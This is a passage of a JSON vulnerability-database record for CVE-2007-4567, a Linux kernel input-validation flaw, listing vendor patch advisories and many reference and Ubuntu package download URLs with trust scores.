      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.14.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1005"
      },
      {
        "title": "ChangeLog-2.6.22",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.22"
      },
      {
        "title": "RHSA-2010:0019",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0019.html"
      },
      {
        "title": "RHSA-2010:0053",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0053.html"
      },
      {
        "title": "RHSA-2010:0079",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0079.html"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100019 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100053 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100079 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-source-2.6.17/20/22 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-558-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-source-2.6.17/20/22 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-574-1"
      },
      {
        "title": "VMware Security Advisories: ESXi utilities and ESX Service Console third party updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=9ca0d654a28a118d1f99d0ae3b1753e8"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/26943"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/25505"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/38015"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/558-1/"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/28170"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/28706"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0019.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0053.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0095.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-574-1"
      },
      {
        "trust": 1.8,
        "url": "http://bugzilla.kernel.org/show_bug.cgi?id=8450"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=548641"
      },
      {
        "trust": 1.8,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39171"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11083"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7474"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=e76b2b2567b83448c2ee85a896433b96150c92e6"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4567"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/39171"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-4567"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2010:0019"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2010:0079"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2010:0095"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2010:0053"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2007-4567"
      },
      {
        "trust": 0.4,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz"
      },
      {
        "trust": 0.4,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz"
      },
      {
        "trust": 0.4,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/changelog-2.6.22-rc1"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4567"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64-smp_2.6.22-14.47_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.42_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-virtual_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.42.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.33_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
